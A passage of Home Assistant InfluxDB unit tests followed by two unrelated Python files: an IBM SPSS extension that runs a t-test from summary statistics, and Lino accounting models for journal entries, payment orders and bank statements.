{"domain": "other", "id": "just_fake", "attrs": {}, "res": "other"},
]
for comp in test_components:
state = MagicMock(
state=1,
domain=comp["domain"],
entity_id=f"{comp['domain']}.{comp['id']}",
object_id=comp["id"],
attributes=comp["attrs"],
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": comp["res"],
"tags": {"domain": comp["domain"], "entity_id": comp["id"]},
"time": 12345,
"fields": {"value": 1},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
write_api.reset_mock()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_ignore_attributes(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener with overridden measurements."""
config = {
"ignore_attributes": ["ignore"],
"component_config": {
"sensor.fake_humidity": {"ignore_attributes": ["id_ignore"]}
},
"component_config_glob": {
"binary_sensor.*motion": {"ignore_attributes": ["glob_ignore"]}
},
"component_config_domain": {
"climate": {"ignore_attributes": ["domain_ignore"]}
},
}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
test_components = [
{
"domain": "sensor",
"id": "fake_humidity",
"attrs": {"glob_ignore": 1, "domain_ignore": 1},
},
{
"domain": "binary_sensor",
"id": "fake_motion",
"attrs": {"id_ignore": 1, "domain_ignore": 1},
},
{
"domain": "climate",
"id": "fake_thermostat",
"attrs": {"id_ignore": 1, "glob_ignore": 1},
},
]
for comp in test_components:
entity_id = f"{comp['domain']}.{comp['id']}"
state = MagicMock(
state=1,
domain=comp["domain"],
entity_id=entity_id,
object_id=comp["id"],
attributes={
"ignore": 1,
"id_ignore": 1,
"glob_ignore": 1,
"domain_ignore": 1,
},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
fields = {"value": 1}
fields.update(comp["attrs"])
body = [
{
"measurement": entity_id,
"tags": {"domain": comp["domain"], "entity_id": comp["id"]},
"time": 12345,
"fields": fields,
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
write_api.reset_mock()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_ignore_attributes_overlapping_entities(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener with overridden measurements."""
config = {
"component_config": {"sensor.fake": {"override_measurement": "units"}},
"component_config_domain": {"sensor": {"ignore_attributes": ["ignore"]}},
}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
state = MagicMock(
state=1,
domain="sensor",
entity_id="sensor.fake",
object_id="fake",
attributes={"ignore": 1},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "units",
"tags": {"domain": "sensor", "entity_id": "fake"},
"time": 12345,
"fields": {"value": 1},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
write_api.reset_mock()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_scheduled_write(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener retries after a write failure."""
config = {"max_retries": 1}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
state = MagicMock(
state=1,
domain="fake",
entity_id="entity.id",
object_id="entity",
attributes={},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
write_api = get_write_api(mock_client)
write_api.side_effect = IOError("foo")
# Write fails
with patch.object(influxdb.time, "sleep") as mock_sleep:
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
assert mock_sleep.called
assert write_api.call_count == 2
# Write works again
write_api.side_effect = None
with patch.object(influxdb.time, "sleep") as mock_sleep:
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
assert not mock_sleep.called
assert write_api.call_count == 3
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_backlog_full(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener drops old events when backlog gets full."""
handler_method = await _setup(hass, mock_client, config_ext, get_write_api)
state = MagicMock(
state=1,
domain="fake",
entity_id="entity.id",
object_id="entity",
attributes={},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
monotonic_time = 0
def fast_monotonic():
"""Monotonic time that ticks fast enough to cause a timeout."""
nonlocal monotonic_time
monotonic_time += 60
return monotonic_time
with patch("homeassistant.components.influxdb.time.monotonic", new=fast_monotonic):
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
assert get_write_api(mock_client).call_count == 0
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_attribute_name_conflict(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener when an attribute conflicts with another field."""
handler_method = await _setup(hass, mock_client, config_ext, get_write_api)
attrs = {"value": "value_str"}
state = MagicMock(
state=1,
domain="fake",
entity_id="fake.something",
object_id="something",
attributes=attrs,
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "fake.something",
"tags": {"domain": "fake", "entity_id": "something"},
"time": 12345,
"fields": {"value": 1, "value__str": "value_str"},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call, test_exception",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
ConnectionError("fail"),
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
influxdb.exceptions.InfluxDBClientError("fail"),
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
influxdb.exceptions.InfluxDBServerError("fail"),
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
ConnectionError("fail"),
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
influxdb.ApiException(),
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_connection_failure_on_startup(
hass, caplog, mock_client, config_ext, get_write_api, get_mock_call, test_exception
):
"""Test the event listener when it fails to connect to Influx on startup."""
write_api = get_write_api(mock_client)
write_api.side_effect = test_exception
config = {"influxdb": config_ext}
with patch(f"{INFLUX_PATH}.event_helper") as event_helper:
assert await async_setup_component(hass, influxdb.DOMAIN, config)
await hass.async_block_till_done()
assert (
len([record for record in caplog.records if record.levelname == "ERROR"])
== 1
)
event_helper.call_later.assert_called_once()
hass.bus.listen.assert_not_called()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call, test_exception",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
influxdb.exceptions.InfluxDBClientError("fail", code=400),
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
influxdb.ApiException(status=400),
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_invalid_inputs_error(
hass, caplog, mock_client, config_ext, get_write_api, get_mock_call, test_exception
):
"""
Test the event listener when influx returns invalid inputs on write.
The difference in error handling in this case is that we do not sleep
and try again, if an input is invalid it is logged and dropped.
Note that this shouldn't actually occur, if its possible for the current
code to send an invalid input then it should be adjusted to stop that.
But Influx is an external service so there may be edge cases that
haven't been encountered yet.
"""
handler_method = await _setup(hass, mock_client, config_ext, get_write_api)
write_api = get_write_api(mock_client)
write_api.side_effect = test_exception
state = MagicMock(
state=1,
domain="fake",
entity_id="fake.something",
object_id="something",
attributes={},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
with patch(f"{INFLUX_PATH}.time.sleep") as sleep:
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api.assert_called_once()
assert (
len([record for record in caplog.records if record.levelname == "ERROR"])
== 1
)
sleep.assert_not_called()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call, precision",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
"ns",
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
"ns",
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
"us",
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
"us",
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
"ms",
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
"ms",
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
"s",
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
"s",
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_precision(
hass, mock_client, config_ext, get_write_api, get_mock_call, precision
):
"""Test the precision setup."""
config = {
"precision": precision,
}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
value = "1.9"
attrs = {
"unit_of_measurement": "foobars",
}
state = MagicMock(
state=value,
domain="fake",
entity_id="fake.entity-id",
object_id="entity",
attributes=attrs,
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "foobars",
"tags": {"domain": "fake", "entity_id": "entity"},
"time": 12345,
"fields": {"value": float(value)},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body, precision)
write_api.reset_mock()
|
|
#/***********************************************************************
# * Licensed Materials - Property of IBM
# *
# * IBM SPSS Products: Statistics Common
# *
# * (C) Copyright IBM Corp. 1989, 2020
# *
# * US Government Users Restricted Rights - Use, duplication or disclosure
# * restricted by GSA ADP Schedule Contract with IBM Corp.
# ************************************************************************/
"""SPSSINC SUMMARY TTEST extension command"""
__author__ = 'spss, JKP'
__version__= '1.0.1'
# Initial formulas provided by Marta Garc<i with acute accent>a-Granero.
# history
# 27-jan-2010 initial version
helptext = """SPSSINC SUMMARY TTEST N1=value(s) N2=value(s) MEAN1=value(s) MEAN2=value(s)
SD1=value(s) SD2=value(s) [CI=percentage] LABEL1=text(s) LABEL2=text(s)
[/HELP]
N1 and N2 are the case counts for the two samples.
MEAN1 and MEAN2 are the means.
SD1 and SD2 are the standard deviations.
LABEL1 and LABEL2 are optional labels for the samples as quoted text.
The N's, means, standard deviations, and labels can be lists of items.
One set of statistics is produced for each
item in the list. All the lists must be the same length.
CI is the confidence level expressed as a percentage. It defaults to 95.
/HELP displays this help and does nothing else.
"""
import spss, spssaux
from extension import Template, Syntax, processcmd
import sys, locale, random
from math import sqrt
class DataStep(object):
def __enter__(self):
"""initialization for with statement"""
try:
spss.StartDataStep()
except:
spss.Submit("EXECUTE")
spss.StartDataStep()
return self
def __exit__(self, type, value, tb):
spss.EndDataStep()
return False
class C(object): # for holding computation variables
pass
def summaryttest(n1, n2, mean1, mean2, sd1, sd2, ci=95., label1=None, label2=None):
"""Create a set of dummy variables that span the values of varname within any current filter.
The parameters are the obvious statistics.
label1 and label2 are text to label the two groups
"""
##debugging
#try:
#import wingdbstub
#if wingdbstub.debugger != None:
#import time
#wingdbstub.debugger.StopDebug()
#time.sleep(2)
#wingdbstub.debugger.StartDebug()
#except:
#pass
###myenc = locale.getlocale()[1] # get current encoding in case conversions needed
numtests = len(n1)
if label1 is None:
label1 = numtests * [_("Sample 1")]
if label2 is None:
label2 = numtests * [_("Sample 2")]
testlist = [len(item) for item in [n1, n2, mean1, mean2, sd1, sd2, label1, label2]]
if min(testlist) != max(testlist):
raise ValueError(_("The same number of values must be given for each statistic or label"))
currentactive = spss.ActiveDataset()
if currentactive == "*":
currentactive = "D" + str(random.uniform(0,1))
spss.Submit("DATASET NAME " + currentactive)
sl = 1 - ci/100.
halfsiglevel = 1.- sl/2.
c = []
for i in range(numtests):
c.append(C())
d = c[i]
if n1[i] < 1. or n2[i] < 1.:
raise ValueError(_("Sample sizes must be at least 1"))
d.sem1 = sd1[i]/sqrt(n1[i])
d.sem2 = sd2[i]/sqrt(n2[i])
d.diff = mean1[i] - mean2[i]
d.var1 =sd1[i]*sd1[i]
d.var2 = sd2[i]*sd2[i]
if d.var1 >= d.var2:
d.ftest = d.var1/d.var2
d.num = n1[i]
d.denom = n2[i]
else:
d.ftest = d.var2/d.var1
d.num = n2[i]
d.denom = n1[i]
d.n = n1[i] + n2[i]
d.poolvar = ((n1[i]-1.) * d.var1 + (n2[i]-1.) * d.var2)/(d.n-2.)
d.eedif1 = sqrt(d.poolvar*(1./n1[i]+1./n2[i]))
d.t1 = d.diff/d.eedif1
d.df1 = d.n-2.
d.eedif2 = sqrt(d.var1/n1[i]+d.var2/n2[i])
d.t2 = d.diff/d.eedif2
d.df2 = ((d.var1/n1[i]+d.var2/n2[i])**2)/(((d.var1/n1[i])**2)/(n1[i]-1.)+((d.var2/n2[i])**2)/(n2[i]-1.))
with DataStep():
###ds = spss.Dataset(None, hidden=True)
dsa = spss.Dataset() # current active
if len(dsa) == 0: # check for empty dataset automatically created when Statistics start
currentactive = None
ds = spss.Dataset(None)
dsname = ds.name
ds.varlist.append('n1',0)
ds.varlist.append('n2',0)
ds.varlist.append('ftest',0)
ds.varlist.append('df1',0)
ds.varlist.append('df2',0)
ds.varlist.append('halfsiglevel',0)
ds.varlist.append('num',0)
ds.varlist.append('denom',0)
ds.varlist.append('t1',0)
ds.varlist.append('t2',0) #9
for i in range(numtests):
d = c[i]
ds.cases.append([n1[i], n2[i], d.ftest, d.df1, d.df2, halfsiglevel, d.num, d.denom, d.t1, d.t2])
spss.SetActive(ds)
spss.Submit("""compute fsig = 1-cdf.f(ftest, num, denom).
compute t1sig=2*(1-cdf.t(abs(t1),df1)).
compute t2sig=2*(1-cdf.t(abs(t2),df2)).
compute idft1 = IDF.T(halfsiglevel,df1).
compute idft2 = IDF.T(halfsiglevel,df2).
compute norm = idf.normal(halfsiglevel,0,1).
execute.""")
with DataStep():
ds = spss.Dataset(dsname)
for i in range(numtests):
d = c[i]
d.fsig = ds.cases[i][10]
d.t1sig = ds.cases[i][11]
d.t2sig = ds.cases[i][12]
d.idft1 = ds.cases[i][13]
d.idft2 = ds.cases[i][14]
norm = abs(ds.cases[0][15])
ds.close()
spss.StartProcedure("Summary T-Test")
for i in range(numtests):
if numtests > 1:
seq = _("Test %d: ") % (i+1)
else:
seq = ""
d = c[i]
d.low1 = d.diff - norm * d.eedif1
d.upp1 = d.diff + norm * d.eedif1
d.low2 = d.diff - norm * d.eedif2
d.upp2 = d.diff + norm * d.eedif2
d.low1exact = d.diff - d.eedif1 * d.idft1
d.upp1exact = d.diff + d.eedif1 * d.idft1
d.low2exact = d.diff - d.eedif2 * d.idft2
d.upp2exact = d.diff +d.eedif2 * d.idft2
pt = NonProcPivotTable("Group Statistics", outlinetitle=_("Summary Data"), tabletitle=seq + _("Summary Data"),
columnlabels=[_("N"), _("Mean"), _("Std. Deviation"), _("Std. Error Mean")])
pt.addrow(rowlabel=label1[i], cvalues=[n1[i], mean1[i], sd1[i], d.sem1])
pt.addrow(rowlabel=label2[i], cvalues=[n2[i], mean2[i], sd2[i], d.sem2])
pt.generate()
pt = NonProcPivotTable("TTEST", outlinetitle=_("Independent Samples Test"),
tabletitle=seq +_("Independent Samples Test"), columnlabels=[_("Mean Difference"), _("Std. Error Difference"),
_("t"), _("df"), _("Sig. (2-tailed)")], caption=_("Hartley test for equal variance: F = %.3f, Sig. = %.4f") %(d.ftest, d.fsig))
pt.addrow(_("Equal variances assumed"), cvalues=[d.diff, d.eedif1, d.t1, d.df1, d.t1sig])
pt.addrow(_("Equal variances not assumed"), cvalues=[d.diff, d.eedif2, d.t2, d.df2, d.t2sig])
pt.generate()
pt = NonProcPivotTable("Confidence Intervals", outlinetitle=_("Confidence Intervals"),
tabletitle=seq + _("%.1f%% Confidence Intervals for Difference") % ci,
columnlabels=[_("Lower Limit"), _("Upper Limit")])
pt.addrow(rowlabel=_("Asymptotic (equal variance)"), cvalues=[d.low1, d.upp1])
pt.addrow(rowlabel=_("Asymptotic (unequal variance)"), cvalues=[d.low2, d.upp2])
pt.addrow(rowlabel=_("Exact (equal variance)"), cvalues = [d.low1exact, d.upp1exact])
pt.addrow(rowlabel=_("Exact (unequal variance)"), cvalues = [d.low2exact, d.upp2exact])
pt.generate()
spss.EndProcedure()
try:
if not currentactive is None:
spss.Submit("DATASET ACTIVATE " + currentactive)
else:
spss.Submit("""NEW FILE.
DATASET NAME D%s.""" % str(random.uniform(0,1)))
except:
pass
def Run(args):
"""Execute the SPSSINC SUMMARY TTEST extension command"""
args = args[list(args.keys())[0]]
oobj = Syntax([
Template("N1", subc="", ktype="float", var="n1", vallist=[0], islist=True),
Template("N2", subc="", ktype="float", var="n2", vallist=[0], islist=True),
Template("MEAN1", subc="", ktype="float", var="mean1", islist=True),
Template("MEAN2", subc="", ktype="float", var="mean2", islist=True),
Template("SD1", subc="", ktype="float", var="sd1", vallist=[0.0001], islist=True),
Template("SD2", subc="", ktype="float", var="sd2", vallist=[0.0001], islist=True),
Template("LABEL1", subc="", ktype="literal", var="label1", islist=True),
Template("LABEL2", subc="", ktype="literal", var="label2", islist=True),
Template("CI", subc="", ktype="float", var="ci", vallist=[.1, 99.9999]),
Template("HELP", subc="", ktype="bool")])
#enable localization
global _
try:
_("---")
except:
def _(msg):
return msg
# A HELP subcommand overrides all else
if "HELP" in args:
#print helptext
helper()
else:
processcmd(oobj, args, summaryttest)
def helper():
"""open html help in default browser window
The location is computed from the current module name"""
import webbrowser, os.path
path = os.path.splitext(__file__)[0]
helpspec = "file://" + path + os.path.sep + \
"markdown.html"
# webbrowser.open seems not to work well
browser = webbrowser.get()
if not browser.open_new(helpspec):
print(("Help file not found:" + helpspec))
try: #override
from extension import helper
except:
pass
class NonProcPivotTable(object):
"""Accumulate an object that can be turned into a basic pivot table once a procedure state can be established"""
def __init__(self, omssubtype, outlinetitle="", tabletitle="", caption="", rowdim="", coldim="", columnlabels=[],
procname="Messages"):
"""omssubtype is the OMS table subtype.
caption is the table caption.
tabletitle is the table title.
columnlabels is a sequence of column labels.
If columnlabels is empty, this is treated as a one-column table, and the rowlabels are used as the values with
the label column hidden
procname is the procedure name. It must not be translated."""
attributesFromDict(locals())
self.rowlabels = []
self.columnvalues = []
self.rowcount = 0
def addrow(self, rowlabel=None, cvalues=None):
"""Append a row labelled rowlabel to the table and set value(s) from cvalues.
rowlabel is a label for the stub.
cvalues is a sequence of values with the same number of values are there are columns in the table."""
if cvalues is None:
cvalues = []
self.rowcount += 1
if rowlabel is None:
self.rowlabels.append(str(self.rowcount))
else:
self.rowlabels.append(rowlabel)
self.columnvalues.extend(cvalues)
def generate(self):
"""Produce the table assuming that a procedure state is now in effect if it has any rows."""
privateproc = False
if self.rowcount > 0:
try:
table = spss.BasePivotTable(self.tabletitle, self.omssubtype)
except:
spss.StartProcedure(self.procname)
privateproc = True
table = spss.BasePivotTable(self.tabletitle, self.omssubtype)
if self.caption:
table.Caption(self.caption)
if self.columnlabels != []:
table.SimplePivotTable(self.rowdim, self.rowlabels, self.coldim, self.columnlabels, self.columnvalues)
else:
table.Append(spss.Dimension.Place.row,"rowdim",hideName=True,hideLabels=True)
table.Append(spss.Dimension.Place.column,"coldim",hideName=True,hideLabels=True)
colcat = spss.CellText.String("Message")
for r in self.rowlabels:
cellr = spss.CellText.String(r)
table[(cellr, colcat)] = cellr
if privateproc:
spss.EndProcedure()
def attributesFromDict(d):
"""build self attributes from a dictionary d."""
self = d.pop('self')
for name, value in d.items():
setattr(self, name, value)
|
|
# Copyright 2008-2020 Rumma & Ko Ltd
# License: GNU Affero General Public License v3 (see file COPYING for details)
from django.db import models
# from django.core.exceptions import ValidationError
from etgen.html import E, join_elems
from lino_xl.lib.ledger.utils import ZERO, MAX_AMOUNT
from lino_xl.lib.ledger.fields import DcAmountField
from lino_xl.lib.ledger.choicelists import DC, VoucherTypes
from lino_xl.lib.ledger.roles import LedgerUser, LedgerStaff
from lino_xl.lib.ledger.mixins import ProjectRelated
from lino_xl.lib.ledger.mixins import PartnerRelated
from lino_xl.lib.sepa.mixins import BankAccount
from lino.modlib.printing.mixins import Printable
from lino.api import dd, rt, _
from .mixins import (FinancialVoucher, FinancialVoucherItem,
DatedFinancialVoucher, DatedFinancialVoucherItem)
from .actions import WritePaymentsInitiation
ledger = dd.resolve_app('ledger')
def warn_jnl_account(jnl):
fld = jnl._meta.get_field('account')
raise Warning(_("Field '{0}' in journal '{0}' is empty!").format(
fld.verbose_name, jnl))
class ShowSuggestions(dd.Action):
# started as a copy of ShowSlaveTable
# TABLE2ACTION_ATTRS = tuple('help_text icon_name label sort_index'.split())
TABLE2ACTION_ATTRS = tuple('help_text label sort_index'.split())
show_in_bbar = False
show_in_workflow = True
readonly = False
@classmethod
def get_actor_label(self):
return self._label or self.slave_table.label
def attach_to_actor(self, actor, name):
if actor.suggestions_table is None:
# logger.info("%s has no suggestions_table", actor)
return # don't attach
if isinstance(actor.suggestions_table, str):
T = rt.models.resolve(actor.suggestions_table)
if T is None:
raise Exception("No table named %s" % actor.suggestions_table)
actor.suggestions_table = T
for k in self.TABLE2ACTION_ATTRS:
setattr(self, k, getattr(actor.suggestions_table, k))
return super(ShowSuggestions, self).attach_to_actor(actor, name)
def run_from_ui(self, ar, **kw):
obj = ar.selected_rows[0]
sar = ar.spawn(ar.actor.suggestions_table, master_instance=obj)
js = ar.renderer.request_handler(sar)
ar.set_response(eval_js=js)
def unused_get_action_permission(self, ar, obj, state):
# It would more intuitive to show Suggestions only for lines
# with a partner. But there are cases where we use it on an
# empty item in order to select suggestions from multiple
# partners.
if not obj.get_partner():
return False
return super(ShowSuggestions, self).get_action_permission(
ar, obj, state)
class JournalEntry(DatedFinancialVoucher, ProjectRelated):
auto_compute_amount = True
class Meta:
app_label = 'finan'
abstract = dd.is_abstract_model(__name__, 'JournalEntry')
verbose_name = _("Journal Entry")
verbose_name_plural = _("Journal Entries")
# show_items = dd.ShowSlaveTable('finan.ItemsByJournalEntry')
def get_wanted_movements(self):
# dd.logger.info("20151211 FinancialVoucher.get_wanted_movements()")
amount, movements_and_items = self.get_finan_movements()
if amount:
raise Warning(_("Missing amount {} in movements").format(
amount))
for m, i in movements_and_items:
yield m
class PaymentOrder(FinancialVoucher, Printable):
class Meta:
app_label = 'finan'
abstract = dd.is_abstract_model(__name__, 'PaymentOrder')
verbose_name = _("Payment Order")
verbose_name_plural = _("Payment Orders")
total = dd.PriceField(_("Total"), blank=True, null=True)
execution_date = models.DateField(
_("Execution date"), blank=True, null=True)
# show_items = dd.ShowSlaveTable('finan.ItemsByPaymentOrder')
write_xml = WritePaymentsInitiation()
@dd.displayfield(_("Print"))
def print_actions(self, ar):
if ar is None:
return ''
elems = []
elems.append(ar.instance_action_button(
self.write_xml))
return E.p(*join_elems(elems, sep=", "))
def get_wanted_movements(self):
"""Implements
:meth:`lino_xl.lib.ledger.Voucher.get_wanted_movements`
for payment orders.
As a side effect this also computes the :attr:`total` field and saves
the voucher.
"""
# dd.logger.info("20151211 cosi.PaymentOrder.get_wanted_movements()")
acc = self.journal.account
if not acc:
warn_jnl_account(self.journal)
# TODO: what if the needs_partner of the journal's account
# is not checked? Shouldn't we raise an error here?
amount, movements_and_items = self.get_finan_movements()
if abs(amount) > MAX_AMOUNT:
# dd.logger.warning("Oops, {} is too big ({})".format(amount, self))
raise Exception("Oops, {} is too big ({})".format(amount, self))
return
self.total = self.journal.dc.normalized_amount(-amount) # PaymentOrder.get_wanted_movements()
# if self.journal.dc == DC.debit: # PaymentOrder.get_wanted_movements()
# self.total = -amount
# else:
# self.total = amount
item_partner = self.journal.partner is None
for m, i in movements_and_items:
yield m
if item_partner:
yield self.create_movement(
i, (acc, None), m.project, -m.amount, # 20201219 PaymentOrder.get_wanted_movements
partner=m.partner, match=i.get_match())
if not item_partner:
yield self.create_movement(
None, (acc, None), None, -amount, # 20201219 PaymentOrder.get_wanted_movements
partner=self.journal.partner, match=self)
# 20191226 partner=self.journal.partner, match=self.get_default_match())
# no need to save() because this is called during set_workflow_state()
# self.full_clean()
# self.save()
def add_item_from_due(self, obj, **kwargs):
# if obj.bank_account is None:
# return
i = super(PaymentOrder, self).add_item_from_due(obj, **kwargs)
i.bank_account = obj.bank_account
return i
# def full_clean(self, *args, **kwargs):
# super(PaymentOrder, self).full_clean(*args, **kwargs)
class BankStatement(DatedFinancialVoucher):
class Meta:
app_label = 'finan'
abstract = dd.is_abstract_model(__name__, 'BankStatement')
verbose_name = _("Bank Statement")
verbose_name_plural = _("Bank Statements")
balance1 = dd.PriceField(_("Old balance"), default=ZERO)
balance2 = dd.PriceField(_("New balance"), default=ZERO, blank=True)
# show_items = dd.ShowSlaveTable('finan.ItemsByBankStatement')
def get_previous_voucher(self):
if not self.journal_id:
#~ logger.info("20131005 no journal")
return None
qs = self.__class__.objects.filter(
journal=self.journal).order_by('-entry_date')
if qs.count() > 0:
#~ logger.info("20131005 no other vouchers")
return qs[0]
def on_create(self, ar):
super(BankStatement, self).on_create(ar)
if self.balance1 == ZERO:
prev = self.get_previous_voucher()
if prev is not None:
#~ logger.info("20131005 prev is %s",prev)
self.balance1 = prev.balance2
def on_duplicate(self, ar, master):
self.balance1 = self.balance2 = ZERO
super(BankStatement, self).on_duplicate(ar, master)
def get_wanted_movements(self):
"""Implements
:meth:`lino_xl.lib.ledger.Voucher.get_wanted_movements`
for bank statements.
As a side effect this also computes the :attr:`balance1` and
:attr:`balance2` fields and saves the voucher.
"""
# dd.logger.info("20151211 cosi.BankStatement.get_wanted_movements()")
a = self.journal.account
if not a:
warn_jnl_account(self.journal)
amount, movements_and_items = self.get_finan_movements()
# dd.logger.info("20210106 %s %s %s", self.balance2, self.balance1, amount)
self.balance2 = self.balance1 + self.journal.dc.normalized_amount(amount) # 20201219 BankStatement.get_wanted_movements()
# if self.journal.dc == DC.credit: # 20201219 BankStatement.get_wanted_movements()
# self.balance2 = self.balance1 + amount
# else:
# self.balance2 = self.balance1 - amount
if abs(self.balance2) > MAX_AMOUNT:
# dd.logger.warning("Oops, %s is too big", self.balance2)
raise Exception("Oops, {} is too big ({})".format(self.balance2, self))
return
for m, i in movements_and_items:
yield m
yield self.create_movement(None, (a, None), None, amount)
# no need to save() because this is called during set_workflow_state()
# self.full_clean()
# self.save()
class JournalEntryItem(DatedFinancialVoucherItem):
class Meta:
app_label = 'finan'
verbose_name = _("Journal Entry item")
verbose_name_plural = _("Journal Entry items")
voucher = dd.ForeignKey('finan.JournalEntry', related_name='items')
debit = DcAmountField(DC.debit, _("Debit"))
credit = DcAmountField(DC.credit, _("Credit"))
class BankStatementItem(DatedFinancialVoucherItem):
class Meta:
app_label = 'finan'
verbose_name = _("Bank Statement item")
verbose_name_plural = _("Bank Statement items")
voucher = dd.ForeignKey('finan.BankStatement', related_name='items')
expense = DcAmountField(DC.debit, _("Expense"))
income = DcAmountField(DC.credit, _("Income"))
class PaymentOrderItem(BankAccount, FinancialVoucherItem):
class Meta:
app_label = 'finan'
verbose_name = _("Payment Order item")
verbose_name_plural = _("Payment Order items")
voucher = dd.ForeignKey('finan.PaymentOrder', related_name='items')
